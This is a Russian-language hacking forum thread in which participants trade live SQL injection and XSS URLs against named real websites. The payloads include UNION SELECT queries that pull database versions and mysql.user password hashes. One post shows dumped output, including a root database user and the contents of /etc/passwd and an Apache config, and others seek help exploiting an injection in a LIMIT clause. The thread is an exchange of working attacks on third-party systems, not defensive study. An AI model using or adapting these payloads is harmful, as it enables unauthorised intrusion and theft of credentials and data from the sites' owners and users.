вообщето это не инклуд а iframe http://extensis.cnrc.navy.mil/index.htm?content=http://google.com' так что доводить нечего...
Code: http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=%3Cscript%3Ealert()%3C/script%3E со скулем можно что-то накрутить? и какие здесь вообще есть варианты?
Code: http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=1+union+select+1,2,3,version(),5,6,7,8,9,10+limit+1,1
Code: http://www.celestron.com/skyscout/skyscout_page.php?page_name=skyscout_features&page_id=-1+union+select+1,2,3,password,5,6,7,8,9,10+from+mysql.user
Code: database(): od4 @@basedir: /usr/ @@tmpdir: /tmp/ version(): 5.0.77 user(): root@localhost <==== @@datadir: /var/lib/mysql/ @@version_compile_os: redhat-linux-gnu ----------------------------------------- File [/etc/passwd] size: - 1759 bytes ----------------------------------------- root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/ ... ----------------------------------------- File [/etc/httpd/conf/httpd.conf] size: - 39844 bytes ----------------------------------------- # # This is the main Apache server configuration file. It contains the # configuration directives that give the server its instructions. # See <URL:http://httpd.apache.org/docs/2.2/> for detailed inf ...
Что значет есле при выходе SQL injection в низу написанно [XT SQL Error] что это?? и ище очень часто я встречяюсь с этим типа You have an error in your SQL syntax;................... [TEP STOP] и разкрутить неразу не удалось.. что это может быть? HELP !"
вроде второй раз уже спрашиваешь, дай живой пример, какая тебе разница, если сам раскрутить не можешь, и телепатировать не придется
Pashkela вот один сайт.. прост не хотел палить ну другова варианта нет _http://piskurek.camping-profi.de/index.php?cat=c189_Kabeltrommeln-und-Stromeinspeisung.html&page=-2%27
Это почти безнадежно, там SQLi в лимите. Насколько знаю в таких случаях возможно использование только into outfile и то если будут права и будеш знать полный путь. Ну а [XT SQL Error] это типа предупреждение вшитое самими разработчиками xt:Commerce.
ну на самом деле можно попробовать еще вот этот способ... http://forum.antichat.ru/threadnav43966-4-10.html
Code: http://www.vales.by/catalog.php?action=show_object&id=109+union+select+concat_ws(0x3a,user(),database(),version())--
